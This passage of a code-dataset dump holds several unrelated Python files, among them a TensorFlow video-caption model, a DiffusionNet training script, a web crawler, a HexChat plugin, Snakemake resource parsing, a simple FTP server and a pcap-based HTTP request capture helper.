n_encoder_T)\n\t\t\t\t# print('attn_weight_shape: ', attn_weight.shape)\n\t\t\t\tattn_apply = tf.matmul(attn_weight_reshape, self.encoder_output) ###(N, 1, n_hidden)\n\t\t\t\tattn_apply = tf.squeeze(attn_apply) ###(N, n_hidden)\n\t\t\t\t# print('attn_apply_shape: ', attn_apply.shape)\n\t\t\t\tattn_decoder_input = tf.concat([current_embed, attn_apply], axis=1) ###(N, n_embed+n_hidden)\n\t\t\t\t# print('new_decoder_input_shape: ', new_decoder_input.shape)\n\t\t\t\tattn_decoder_input = self.attn_dense2(attn_decoder_input) ###(N, n_embed)\n\t\t\t\t# print('new_decoder_input_shape: ', attn_decoder_input.shape)\n\n\n\t\t\t\twith tf.variable_scope('LSTM2'):\n\t\t\t\t\tif i > 0:\n\t\t\t\t\t\ttf.get_variable_scope().reuse_variables()\n\t\t\t\t\tdecoder_output, decoder_state = self.lstm2(attn_decoder_input, decoder_state)\n\t\t\t\t# print('decoder_output_shape:', decoder_output.shape) ###(N, n_hidden)\n\t\t\t\t# print('decoder_state_shape:', decoder_state.c.shape) ###(N, n_hidden)\n\t\t\t\t# print('decoder_state_shape:', decoder_state.h.shape)\n\n\t\t\t\tdecoder_output = self.out_fc(decoder_output)\n\t\t\t\t# print('decoder_output_after_shape:', decoder_output.shape) ###(N, n_decoder_input)\n\t\t\t\tdecoder_pred = tf.argmax(decoder_output, axis=1)\n\t\t\t\t# print('decoder_pred_shape:', decoder_pred.shape) ###(N,)\n\t\t\t\tpred_all.append(tf.reshape(decoder_pred, (self.batch_size, 1)))\n\n\n\t\t\t\tstepwise_cross_entropy = tf.nn.softmax_cross_entropy_with_logits(\n\t\t\t\t\tlabels = tf.one_hot(self.decoder_input[:, i+1], depth=self.n_decoder_input, dtype=tf.float32), ###(N, n_decoder_input)\n\t\t\t\t\tlogits = decoder_output,\n\t\t\t\t)\n\t\t\t\t# print('loss shape:', stepwise_cross_entropy.shape) ###(N, )\n\t\t\t\tcurrent_loss = tf.reduce_mean(stepwise_cross_entropy, axis=0)\n\t\t\t\tself.loss = self.loss + current_loss\n\n\t\tself.pred_caption_teacher = tf.concat(pred_all, axis=1)\n\t\t# print('pred_caption.shape:', self.pred_caption.shape)\n\t\tself.train_op = tf.train.AdamOptimizer(LR).minimize(self.loss)\n\n\tdef pred(self, encoder_input_data):\n\t\tdecoder_state = self.encoder_final_state\n\t\tpred_all = []\n\t\tdecoder_input = tf.ones(shape=[self.batch_size,], dtype=tf.int32)\n\t\t# print('decoder_input_shape_before: ', decoder_input.shape)\n\t\tfor i in range(self.n_decoder_T-1):\n\t\t\tcurrent_embed = tf.nn.embedding_lookup(self.embedding_dict, decoder_input) ###(N, n_embed)\n\t\t\th_plus_embed = tf.concat([current_embed, decoder_state.h], axis=1)\n\t\t\tself.attn_weight = self.attn_dense(h_plus_embed)\n\t\t\tattn_weight_reshape = tf.reshape(self.attn_weight, shape=(self.batch_size, 1, self.n_encoder_T))\n\t\t\tattn_apply = tf.matmul(attn_weight_reshape, self.encoder_output)\n\t\t\tattn_apply = tf.squeeze(attn_apply)\n\t\t\tattn_decoder_input = tf.concat([current_embed, attn_apply], axis=1)\n\t\t\tattn_decoder_input = self.attn_dense2(attn_decoder_input)\n\n\t\t\twith tf.variable_scope('LSTM2'):\n\t\t\t\tif i > 0:\n\t\t\t\t\ttf.get_variable_scope().reuse_variables()\n\t\t\t\tdecoder_output, decoder_state = self.lstm2(attn_decoder_input, decoder_state)\t\t\t\n\n\t\t\tdecoder_output = self.out_fc(decoder_output)\n\t\t\tdecoder_input = tf.argmax(decoder_output, axis=1)\n\t\t\t# print('decoder_input_shape_after: ', decoder_input.shape)\n\t\t\tdecoder_pred = tf.reshape(decoder_input, (self.batch_size, 1))\n\t\t\tpred_all.append(decoder_pred)\n\t\t\t\n\t\tself.pred_caption_self = tf.concat(pred_all, axis=1)\n\n\t\tpredict = self.sess.run(self.pred_caption_self, 
feed_dict={\n\t\t\t\tself.encoder_input: encoder_input_data\n\t\t\t})\n\t\treturn predict\n\n\n\tdef init_op(self):\n\t\tself.sess = tf.Session()\n\t\tself.sess.run(tf.global_variables_initializer())\n\t\tprint('Initialized')\n\t\tprint('='*100)\n\n\tdef train(self, encoder_input_data, decoder_input_data):\n\n\t\t_, loss, predict = self.sess.run([self.train_op, self.loss, self.pred_caption_teacher], feed_dict={\n\t\t\t\tself.encoder_input: encoder_input_data,\n\t\t\t\tself.decoder_input: decoder_input_data,\n\t\t\t})\n\n\t\treturn loss, predict\n\n\nif __name__ == '__main__':\n\tmodel = Videl_Caption_Generator_ATTN(4096, 256, 2000, 500)\n","sub_path":"tensorflow/Seq2Seq/tensorflow-vedio-caption/model_tensorflow_attn.py","file_name":"model_tensorflow_attn.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"409902166","text":"import os\nimport sys\nimport argparse\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport numpy as np\n\n\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../src/\")) # add the path to the DiffusionNet src\nimport diffusion_net\nfrom faust_with_robust_test_dataset import FaustWithRobustTestDataset\n\n\n# === Options\n\n# Parse a few args\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--evaluate\", action=\"store_true\", help=\"evaluate using the pretrained model\")\nparser.add_argument(\"--input_features\", type=str, help=\"what features to use as input ('xyz' or 'hks') default: xyz\", default = 'xyz')\nargs = parser.parse_args()\n\n\n# system things\ndevice = torch.device('cuda:0')\ndtype = torch.float32\n\n# problem/dataset things\nn_class = 6890\n\n# model \ninput_features = args.input_features # one of ['xyz', 'hks']\nk_eig = 128\n\n# training settings\ntrain = not args.evaluate\nn_epoch = 200\nlr = 1e-3\ndecay_every = 50\ndecay_rate = 0.5\naugment_random_rotate = (input_features == 'xyz')\n\n\n\n# Important paths\nbase_path = os.path.dirname(__file__)\nop_cache_dir = os.path.join(base_path, \"data\", \"op_cache\")\ngeodesic_cache_dir = os.path.join(base_path, \"data\", \"geodesic_cache\") # for evaluating error metrics\npretrain_path = os.path.join(base_path, \"pretrained_models/categorical_correspondence_{}_4x256.pth\".format(input_features))\nmodel_save_path = os.path.join(base_path, \"data/saved_models/categorical_correspondence_{}_4x256.pth\".format(input_features))\ndataset_path = os.path.join(base_path, \"data\")\n\n\n# === Load datasets\n\n# Load the test dataset\ntest_dataset = FaustWithRobustTestDataset(dataset_path, train=False, k_eig=k_eig, use_cache=True, op_cache_dir=op_cache_dir)\ntest_loader = DataLoader(test_dataset, batch_size=None)\n\n# Load the train dataset\ntrain_dataset = FaustWithRobustTestDataset(dataset_path, train=True, k_eig=k_eig, use_cache=True, op_cache_dir=op_cache_dir)\ntrain_loader = DataLoader(train_dataset, batch_size=None, shuffle=True)\n\n# Use the first shape in the training dataset as the reference model (used for measuring geodesic error below)\nverts_ref, faces_ref = train_dataset[0][:2]\nverts_ref.requires_grad = False\nfaces_ref.requires_grad = False\n\n\n# === Create the model\n\nC_in={'xyz':3, 'hks':16}[input_features] # dimension of input features\n\nmodel = diffusion_net.layers.DiffusionNet(C_in=C_in,\n C_out=n_class,\n C_width=256, \n N_block=4, \n last_activation=lambda x : torch.nn.functional.log_softmax(x,dim=-1),\n outputs_at='vertices', \n 
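# (editor's note, added) last_activation=log_softmax pairs with the nll_loss call in train_epoch below\n 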
dropout=True)\n\n\nmodel = model.to(device)\n\nif not train:\n # load the pretrained model\n print(\"Loading pretrained model from: \" + str(pretrain_path))\n model.load_state_dict(torch.load(pretrain_path))\n print(\"...done\")\n\n\n# === Optimize\noptimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\ndef train_epoch(epoch):\n\n # Implement lr decay\n if epoch > 0 and epoch % decay_every == 0:\n global lr \n lr *= decay_rate\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr \n\n\n # Set model to 'train' mode\n model.train()\n optimizer.zero_grad()\n \n correct = 0\n total_num = 0\n for data in tqdm(train_loader):\n\n # Get data\n verts, faces, frames, mass, L, evals, evecs, gradX, gradY, labels, _ = data\n\n # Move to device\n verts = verts.to(device)\n faces = faces.to(device)\n frames = frames.to(device)\n mass = mass.to(device)\n L = L.to(device)\n evals = evals.to(device)\n evecs = evecs.to(device)\n gradX = gradX.to(device)\n gradY = gradY.to(device)\n labels = labels.to(device)\n \n # Randomly rotate positions\n if augment_random_rotate:\n # Rotate about up (Y-axis) only\n verts = diffusion_net.utils.random_rotate_points_y(verts)\n\n # Construct features\n if input_features == 'xyz':\n features = verts\n elif input_features == 'hks':\n features = diffusion_net.geometry.compute_hks_autoscale(evals, evecs, 16)\n\n # Apply the model\n preds = model(features, mass, L=L, evals=evals, evecs=evecs, gradX=gradX, gradY=gradY)\n\n # Evaluate loss\n loss = torch.nn.functional.nll_loss(preds, labels)\n loss.backward()\n \n # track accuracy\n pred_labels = torch.max(preds, dim=1).indices\n this_correct = pred_labels.eq(labels).sum().item()\n this_num = labels.shape[0]\n correct += this_correct\n total_num += this_num\n\n # Step the optimizer\n optimizer.step()\n optimizer.zero_grad()\n\n train_acc = correct / total_num\n return train_acc\n\n\n# Do an evaluation pass on the test dataset \ndef test(with_geodesic_error=False):\n\n if with_geodesic_error:\n print(\"Evaluating geodesic error metrics\")\n \n model.eval()\n \n correct = 0\n total_num = 0\n with torch.no_grad():\n\n # If measuring geodesic error, keep track of it (for each type of mutation)\n mut_geodesic_errors = {}\n \n i = 0\n for data in tqdm(test_loader):\n\n # Get data\n verts, faces, frames, mass, L, evals, evecs, gradX, gradY, labels, mut = data\n\n \n # Move to device\n verts = verts.to(device)\n faces = faces.to(device)\n frames = frames.to(device)\n mass = mass.to(device)\n L = L.to(device)\n evals = evals.to(device)\n evecs = evecs.to(device)\n gradX = gradX.to(device)\n gradY = gradY.to(device)\n labels = labels.to(device)\n \n # Construct features\n if input_features == 'xyz':\n features = verts\n elif input_features == 'hks':\n features = diffusion_net.geometry.compute_hks_autoscale(evals, evecs, 16)\n\n # Apply the model\n preds = model(features, mass, L=L, evals=evals, evecs=evecs, gradX=gradX, gradY=gradY)\n\n # track accuracy\n pred_labels = torch.max(preds, dim=1).indices\n this_correct = pred_labels.eq(labels).sum().item()\n this_num = labels.shape[0]\n correct += this_correct\n total_num += this_num\n\n if with_geodesic_error:\n\n pred_labels = torch.max(preds, dim=-1).indices\n errors = diffusion_net.geometry.geodesic_label_errors(verts_ref, faces_ref, pred_labels, labels, normalization='diameter', geodesic_cache_dir=geodesic_cache_dir)\n\n if mut not in mut_geodesic_errors:\n mut_geodesic_errors[mut] = []\n mut_geodesic_errors[mut].extend(errors)\n\n\n if with_geodesic_error:\n 
print(\"\\n== Geodesic errors ==\")\n for mut in mut_geodesic_errors:\n print(\" {:>8} mean: {:.2f}\".format(mut, 100*np.mean(mut_geodesic_errors[mut])))\n\n test_acc = correct / total_num\n return test_acc \n\n\nif train:\n print(\"Training...\")\n\n for epoch in range(n_epoch):\n train_acc = train_epoch(epoch)\n test_acc = test()\n print(\"Epoch {} - Train overall: {:06.3f}% Test overall: {:06.3f}%\".format(epoch, 100*train_acc, 100*test_acc))\n\n print(\" ==> saving last model to \" + model_save_path)\n torch.save(model.state_dict(), model_save_path)\n\n\n# Test\ntest_acc = test(with_geodesic_error=True)\nprint(\"Overall test accuracy: {:06.3f}%\".format(100*test_acc))\n","sub_path":"experiments/sampling_invariance/sampling_invariance.py","file_name":"sampling_invariance.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"386034835","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport urllib.request\nfrom lxml import etree\n\n\ndef crawl(url):\n headers={\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n }\n req=urllib.request.Request(url,headers=headers)\n resp=urllib.request.urlopen(req,timeout=10)\n html=resp.read().decode('utf-8')\n\n element=etree.HTML(html)\n li_lists=element.xpath('//div[@id=\"nowplaying\"]//ul[@class=\"lists\"]/li')\n for li in li_lists:\n title=li.xpath('./@data-title')[0]\n score=li.xpath('./@data-score')[0]\n duration=li.xpath('./@data-duration')[0]\n region=li.xpath('./@data-region')[0]\n director=li.xpath('./@data-director')[0]\n actors=li.xpath('./@data-actors')[0]\n img=li.xpath('.//img/@src')[0]\n\n print(title,score,duration,region,director,actors,img)\n\n\nif __name__ == '__main__':\n url='https://movie.douban.com/cinema/nowplaying/xian/'\n crawl(url)","sub_path":"02_PC端/豆瓣/正在上映电影.py","file_name":"正在上映电影.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"347735737","text":"\n\n#calss header\nclass _HOOKER():\n\tdef __init__(self,): \n\t\tself.name = \"HOOKER\"\n\t\tself.definitions = [u'a prostitute (= woman who has sex for money)', u'a rugby player who pulls the ball out of the scrum with his foot']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_hooker.py","file_name":"_hooker.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"382466048","text":"import hexchat\n\n__module_name__ = \"blocknotice.py\"\n__module_author__ = \"Mika Wu\"\n__module_version__ = \"0.1.0.151007\"\n__module_description__ = \"Redirects notices to server tab.\"\n\ndef redirect_cb(word, word_eol, userdata):\n\t\"\"\"Print user message with an abbreviated username\n\tif it exceeds the specified trim length.\n\n\tArgs:\n\t\tword: Passed by hook. Contains user nick, message, and op status.\n\t\tword_eol: Passed by hook. 
Gives \"word\" contents from the provided\n\t\t\t\t index and onward.\n\t\tuserdata: Additional argument in hook can be passed through userdata.\n\t\t\t\t Used here to better handle multiple types of message events.\n\n\tReturns:\n\t\tEAT_* constant: Controls how Hexchat procedes when callback returns.\n\t\tHere we will use \"EAT_ALL\" to soft \"delete\" the original message\n\t\tin its original context.\n\n\tSee HEXCHAT documentation for futher information.\n\t\"\"\"\n\tif word[0] == \"*status\":\n\t\tschan = hexchat.find_context(channel='Rizon')\n\t\tschan.emit_print(\"Server Text\", word[1])\n\t\treturn hexchat.EAT_ALL\n\n\n# Refer to Settings/Text Events for additional event names.\nhexchat.hook_print(\"Notice\", redirect_cb)\nprint(__module_name__, __module_version__, \"has been loaded.\")\n","sub_path":"blocknotice.py","file_name":"blocknotice.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"244361994","text":"# -*- coding: utf-8 -*-\nimport glob\nfrom pathlib import Path\n\nimport torch\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nfrom PIL import Image\n\n\nclass ReverseLeNormalize(object):\n # Normalzie to [0.0, 1.0]\n def __call__(self, tensor):\n pass\n\n\nclass LeNormalize(object):\n # Normalize to [-1.0, 1.0]\n def __call__(self, tensor):\n for t in tensor:\n t.sub_(0.5).mul_(2.0)\n return tensor\n\n\ndef original_transform(sz):\n tf = transforms.Compose([\n transforms.Scale(sz),\n transforms.CenterCrop(sz),\n transforms.ToTensor(),\n ])\n return tf\n\n\ndef default_inception_transform(sz):\n tf = transforms.Compose([\n transforms.Scale(sz),\n transforms.CenterCrop(sz),\n transforms.ToTensor(),\n LeNormalize(),\n ])\n return tf\n\n\ndef default_transform_v2(sz):\n tf = transforms.Compose([\n transforms.Scale(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n ])\n return tf\n\n\ndef default_transform(sz):\n tf = transforms.Compose([\n transforms.Scale(sz),\n transforms.CenterCrop(sz),\n transforms.ToTensor(),\n ])\n return tf\n\n\nclass DataLoader(data.DataLoader):\n def get_filenames(self, idx, size):\n idx_st = idx * self.batch_size\n\n return [\n self.dataset.get_filename(file_idx)\n for file_idx in range(\n idx_st,\n idx_st + size)]\n\n\nclass Dataset(data.Dataset):\n def __init__(self, input_dir, transform=None):\n self.input_dir = input_dir\n self.transform = transform\n\n self.imgs = sorted(list(glob.glob(str(\n Path(input_dir) /\n Path(\"./*.png\")))))\n\n def __getitem__(self, index):\n path = self.imgs[index]\n img = Image.open(path).convert('RGB')\n if self.transform is not None:\n img = self.transform(img)\n\n target = torch.zeros(1).long()\n return img, target\n\n def __len__(self):\n return len(self.imgs)\n\n def set_transform(self, transform):\n self.transform = transform\n\n def get_filename(self, idx):\n return Path(self.imgs[idx]).name\n","sub_path":"attack/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"460668908","text":"import re\nimport tempfile\n\n\nclass DefaultResources:\n defaults = {\n \"mem_mb\": \"max(2*input.size_mb, 1000)\",\n \"disk_mb\": \"max(2*input.size_mb, 1000)\",\n \"tmpdir\": \"system_tmpdir\",\n }\n\n bare_defaults = {\n \"tmpdir\": \"system_tmpdir\",\n }\n\n @classmethod\n def decode_arg(cls, arg):\n try:\n return arg.split(\"=\")\n except ValueError:\n raise 
ValueError(\"Resources have to be defined as name=value pairs.\")\n\n @classmethod\n def encode_arg(cls, name, value):\n return \"{}={}\".format(name, value)\n\n def __init__(self, args=None, from_other=None, mode=\"full\"):\n if mode == \"full\":\n self._args = dict(DefaultResources.defaults)\n elif mode == \"bare\":\n self._args = dict(DefaultResources.bare_defaults)\n else:\n raise ValueError(\"Unexpected mode for DefaultResources: {}\".format(mode))\n\n if from_other is not None:\n self._args = dict(from_other._args)\n self.parsed = dict(from_other.parsed)\n else:\n if args is None:\n args = []\n\n self._args.update(\n {name: value for name, value in map(self.decode_arg, args)}\n )\n\n def fallback(val):\n def callable(wildcards, input, attempt, threads, rulename):\n try:\n value = eval(\n val,\n {\n \"input\": input,\n \"attempt\": attempt,\n \"threads\": threads,\n \"system_tmpdir\": tempfile.gettempdir(),\n },\n )\n # Triggers for string arguments like n1-standard-4\n except NameError:\n return val\n return value\n\n return callable\n\n self.parsed = dict(_cores=1, _nodes=1)\n self.parsed.update(parse_resources(self._args, fallback=fallback))\n\n def set_resource(self, name, value):\n self._args[name] = \"{}\".format(value)\n self.parsed[name] = value\n\n @property\n def args(self):\n return [self.encode_arg(name, value) for name, value in self._args.items()]\n\n def __bool__(self):\n return bool(self.parsed)\n\n\ndef parse_resources(resources_args, fallback=None):\n \"\"\"Parse resources from args.\"\"\"\n resources = dict()\n if resources_args is not None:\n valid = re.compile(r\"[a-zA-Z_]\\w*$\")\n\n if isinstance(resources_args, list):\n resources_args = map(DefaultResources.decode_arg, resources_args)\n else:\n resources_args = resources_args.items()\n\n for res, val in resources_args:\n if not valid.match(res):\n raise ValueError(\n \"Resource definition must start with a valid identifier, but found {}.\".format(\n res\n )\n )\n try:\n val = int(val)\n except ValueError:\n if fallback is not None:\n val = fallback(val)\n else:\n raise ValueError(\n \"Resource definiton must contain an integer after the identifier.\"\n )\n if res == \"_cores\":\n raise ValueError(\n \"Resource _cores is already defined internally. 
Use a different name.\"\n )\n resources[res] = val\n return resources\n","sub_path":"snakemake/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"580580142","text":"#/usr/bin/python env\n#coding:utf8\n\n'''\n用户认证\n支持断点续传\n客户端支持目录切换\n客户端可以查看服务端文件(如果写不出忽略)\n'''\n\nimport socketserver\nimport os\nimport json\n\nclass MyServer(socketserver.BaseRequestHandler):\n\n def handle(self):\n # print self.request,self.client_address,self.server\n conn = self.request\n conn.sendall(bytes('欢迎使用FTP系统',encoding='utf-8'))\n #登入\n while True:\n if user_login(conn) == True:\n ftp_receive(conn)\n break\n else:\n #如果用户密码不对,继续登入\n continue\n\n\ndef user_login(conn):\n # 接收用户名密码\n data_bytes = conn.recv(1024)\n data_user_str = str(data_bytes, encoding='utf-8')\n print(data_user_str)\n conn.sendall(bytes('null', encoding='utf-8'))\n data_bytes = conn.recv(1024)\n data_passwd_str = str(data_bytes, encoding='utf-8')\n print(data_passwd_str)\n # 判断用户密码\n if data_user_str == 'darren' and data_passwd_str == \"123\":\n conn.sendall(bytes('登入成功', encoding='utf-8'))\n return True\n else:\n conn.sendall(bytes('登入失败', encoding='utf-8'))\n return False\n\ndef ftp_receive(conn):\n while True:\n data = conn.recv(1024)\n data_str = str(data,encoding='utf-8')\n print(data_str)\n hander,file_size_str,file_path,file_status,file_dir_list = data_str.split('|')\n file_size_int = int(file_size_str)\n print(hander, file_size_int, file_path,file_status)\n if hander == \"file\":\n #发送消息告诉客户端要开始发送\n conn.sendall(bytes(\"server-respone\",encoding='utf-8'))\n\n #如果是单文件\n if file_status == \"no\":\n with open(file_path, 'wb') as f:\n while file_size_int >=0:\n #print(file_size_int)\n # 接收文件\n data = conn.recv(1024)\n f.write(data)\n file_size_int -= 1024\n if os.path.getsize(file_path) == int(file_size_str):\n print(\"%s 文件接收完毕\" % file_path)\n conn.sendall(bytes('发送完成 %s' % file_path, encoding='utf-8'))\n continue\n #如果是目录下的多文件\n elif file_status == \"yes\":\n #按文件路径依次\n with open(file_path,'wb') as f:\n while file_size_int >0:\n # 接收文件\n data = conn.recv(1024)\n f.write(data)\n file_size_int -= 1024\n if os.path.getsize(file_path) == int(file_size_str):\n print(\"%s 文件接收完毕\"%file_path)\n conn.sendall(bytes('发送完成 %s'%file_path,encoding='utf-8'))\n continue\n elif hander == \"dir\":\n os.mkdir(file_path)\n file_path_list = json.loads(file_dir_list)\n for dir in file_path_list:\n os.mkdir(dir)\n conn.sendall(bytes('目录创建完成 %s' % file_path, encoding='utf-8'))\nif __name__ == '__main__':\n server = socketserver.ThreadingTCPServer(('127.0.0.1',8000),MyServer)\n server.serve_forever()","sub_path":"stu02-ftp/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"604409234","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(19680801)\n\n# example data\nmu = 100 # mean of distribution\nsigma = 15 # standard deviation of distribution\nx = mu + sigma * np.random.randn(400)\n\nnum_bins = 100\n\nfig, ax = plt.subplots()\n\n# histogram on data\nn, bins, patches = ax.hist(x, num_bins, density=1)\n\nplt.show()","sub_path":"Visualization/Matplotlib/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} 
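The snakemake/resources.py record that closes above parses resources supplied as name=value strings: integer values are coerced with int(), the token system_tmpdir resolves via tempfile.gettempdir(), and other non-integer values fall back to a callable that eval()s expressions like max(2*input.size_mb, 1000) against the job's wildcards, input, attempt, and threads. A minimal standalone sketch of the name=value parsing half of that pattern, assuming only the Python standard library (parse_demo_resources and the sample argument list are illustrative, not taken from the record):

import re
import tempfile

def parse_demo_resources(args):
    # Turn ["mem_mb=1000", "machine=n1-standard-4", "tmpdir=system_tmpdir"]
    # into a dict: integer values become ints, the special token
    # "system_tmpdir" resolves to the platform temp directory, and any
    # other non-integer value (e.g. a machine type) is kept verbatim.
    valid = re.compile(r"[a-zA-Z_]\w*$")
    resources = {}
    for arg in args:
        name, _, value = arg.partition("=")
        if not valid.match(name):
            raise ValueError(
                "Resource name must be a valid identifier, got {!r}".format(name)
            )
        try:
            resources[name] = int(value)
        except ValueError:
            resources[name] = tempfile.gettempdir() if value == "system_tmpdir" else value
    return resources

print(parse_demo_resources(["mem_mb=1000", "machine=n1-standard-4", "tmpdir=system_tmpdir"]))
# e.g. {'mem_mb': 1000, 'machine': 'n1-standard-4', 'tmpdir': '/tmp'} (temp dir is platform-dependent)

The record's real fallback is lazier than this sketch: rather than resolving values up front, it wraps each non-integer value in a closure, so expressions are only evaluated once the input sizes and the attempt number are known at scheduling time, and plain strings such as machine types pass through via the NameError branch.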
+{"seq_id":"109386033","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport urllib2\nimport json\nfrom oauth import get_token\n\nfrom http import post_request, get_request\n\n\n\ndef get_userid(openid):\n token = get_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/user/convert_to_userid?access_token=%s\"%token\n data = {\"openid\": openid}\n response = post_request(url, **data)\n return response\n\n\ndef get_userinfo(userid):\n token = get_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/user/get?access_token={0}&userid={1}\".format(token, userid)\n response = get_request(url)\n return response\n\"\"\"\n{\n \"errcode\": 0,\n \"errmsg\": \"ok\",\n \"userid\": \"zhangsan\",\n \"name\": \"李四\",\n \"department\": [1, 2],\n \"position\": \"后台工程师\",\n \"mobile\": \"15913215421\",\n \"gender\": \"1\",\n \"email\": \"zhangsan@gzdev.com\",\n \"weixinid\": \"lisifordev\", \n \"avatar\": \"http://wx.qlogo.cn/mmopen/ajNVdqHZLLA3WJ6DSZUfiakYe37PKnQhBIeOQBO4czqrnZDS79FH5Wm5m4X69TBicnHFlhiafvDwklOpZeXYQQ2icg/0\",\n \"status\": 1,\n \"extattr\": {\"attrs\":[{\"name\":\"爱好\",\"value\":\"旅游\"},{\"name\":\"卡号\",\"value\":\"1234567234\"}]}\n}\n\"\"\"\n\ndef get_member_all(department_id, fetch_child = 0, status=1):\n token = get_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/user/list?access_token={0}&department_id={1}&fetch_child={2}&status={3}\".format(token, department_id, fetch_child, status)\n response = get_request(url)\n return response\n\n\ndef get_member(department_id, fetch_child = 0, status=1):\n token = get_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token={0}&department_id={1}&fetch_child={2}&status={3}\".format(token, department_id, fetch_child, status)\n response = get_request(url)\n return response\n","sub_path":"approval/sdk/member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"598629270","text":"\"\"\"\n##################################################################\nмногократно используемый класс формы, задействованный\nв сценарии getfilegui (и в других)\n##################################################################\n\"\"\"\n\nfrom tkinter import *\n\n\nclass Form: # немодальное окно формы\n def __init__(self, labels, parent=None): # передать список меток полей\n self.entry_size = 40\n self.label_size = max(len(x) for x in labels) + 2\n box = Frame(parent) # в окне есть ряды, кнопка\n box.pack(expand=YES, fill=BOTH) # ряды оформлены, как фреймы\n rows = Frame(box, bd=2, relief=GROOVE) # нажатие кнопки или Enter\n rows.pack(side=TOP, expand=YES, fill=X) # вызывают метод on_submit\n self.content = {}\n for label in labels:\n row = Frame(rows)\n row.pack(fill=X)\n Label(row, text=label, width=self.label_size).pack(side=LEFT)\n entry = Entry(row, width=self.entry_size)\n entry.pack(side=RIGHT, expand=YES, fill=X)\n self.content[label] = entry\n Button(box, text=\"Cancel\", command=self.on_cancel).pack(side=RIGHT)\n Button(box, text=\"Submit\", command=self.on_submit).pack(side=RIGHT)\n box.master.bind(\"\", lambda event: self.on_submit())\n self.box = box\n\n def on_submit(self): # переопределить этот метод в подклассах\n for key in self.content:\n print(key, '\\t=>\\t', self.content[key].get().lstrip())\n\n def on_cancel(self): # переопределить этот метод в подклассах\n self.box.master.quit()\n\n\nclass DynamicForm(Form):\n def __init__(self, labels=None, parent=None):\n labels = input(\"Enter field 
names: \").split()\n super(DynamicForm, self).__init__(labels, parent)\n\n def on_submit(self):\n print(\"Field values...\")\n super(DynamicForm, self).on_submit()\n self.on_cancel()\n\n\nif __name__ == \"__main__\":\n import sys\n root = Tk()\n if len(sys.argv) == 1:\n Form([\"Name\", \"Age\", \"Job\"], root) # предопределенные поля остаются после передачи\n else:\n DynamicForm(root) # динамически созданные поля ичезают\n root.mainloop()\n","sub_path":"dev/Internet/Sockets/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"460296882","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n\nimport pcap\nimport dpkt\nimport multiprocessing\n\nclass datapacketscan():\n def __init__(self,host,queue):\n self.host = host\n self.pack=pcap.pcap('eth0')\n self.pack.setfilter('tcp port 80')\n self.queue = multiprocessing.Queue()\n self.queue = queue\n\n def data_analyse(self):\n for ptime,pdata in self.pack:\n p=dpkt.ethernet.Ethernet(pdata)\n if p.data.data.__class__.__name__=='TCP':\n if p.data.data.dport==80 and len(p.data.data.data) > 0:\n http = dpkt.http.Request(p.data.data.data)\n if http.headers['host'] == self.host:\n #print p.data.data.data\n self.queue.put(http.uri)\n \n\n\n","sub_path":"lib/Capture_detection.py","file_name":"Capture_detection.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"76454000","text":"import xmltodict\n#map key:\n# x = wall\n# exit types:\n# 0 = combat door\n# 1 = puzzle door\n# 2 = timing/dexterity door\n# 3 = tower exit door\ndef digest(path):\n raw = xmltodict.parse(open(path,'r').read())['ax']\n rows = raw.split()\n dig = []\n \n for d in range(20):\n dig.append(list(rows[d]))\n \n return dig\n\nclass Map:\n def __init__(self,dig):\n self.dig = 